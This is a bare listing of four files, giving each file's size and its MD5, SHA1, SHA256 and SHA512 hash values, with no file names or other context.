47.0MB
MD55eba758ab6c01a378d8f67c30e327cba
SHA15e0040767b9093e337ee6384f8a2830ddf2a0f76
SHA2565d8e8e31e5529bf443f5d654a21bc0ec836520348ee91b185eb1477d67258bd6
SHA512e4a8b7760cd6e8f02ae54f9f3b0b9980a9fef6a820ccdd1a5821aefbca8469887c33e346ea216575ccca003aa0c85fd51b7317a0552124dfd8c29e469fbd3d2c
-
Filesize
120B
MD5b3ef898c1fa1dc38db5fb361a13e62ae
SHA1b3ebfc17c313b198eacc0fdabbafbd3f4992667c
SHA2565c6a550ed2436880f2c51fec41f34e8ef9f42104aa79ca62ea201ec13b59e492
SHA512af4f066085e0e3f6f2b03216e283c9cb1dfbf62611fc85d9ca64e1409f6911cfcb69f9369e0ddac289a501b4644a7c9b5f3a0931e76110edbbb9976ceb39979f
-
Filesize
27KB
MD5a7fa60fcc15c099411e731692ce407a2
SHA1358ab5900db46be09cc42f3bf84189bed9bc5405
SHA256b91ba3c712e5d347f28562cd24edd79f74a019cef932c151c88b534ea2e6779a
SHA5127e02d5c9a90013c7f82958cf36f9125f35e180c7d3e0740f3afaf40fc789b97c04c58a83c2d60f53ace887fd2908237d0e0c1659d60138e4e6497e9f8492906b
-
Filesize
14KB
MD5b800dfca5ad6a9c16544f524e88ad1de
SHA1ab7a5d9628816528875ea11de3d7ceef1b82867b
SHA25641fca4ae9e18428ba549c4b4aa2f32f86b7c5672869699c620e974cd0f742baf
SHA512239f7453b8f370e5f5382c0c3e67738a8ee3f5ba1b9b080f93b2f4fc0ba11b3129c816f1d7b837912d6efef2d6d5b85b7eb87ca139d25dcadc80ca15bb550d2f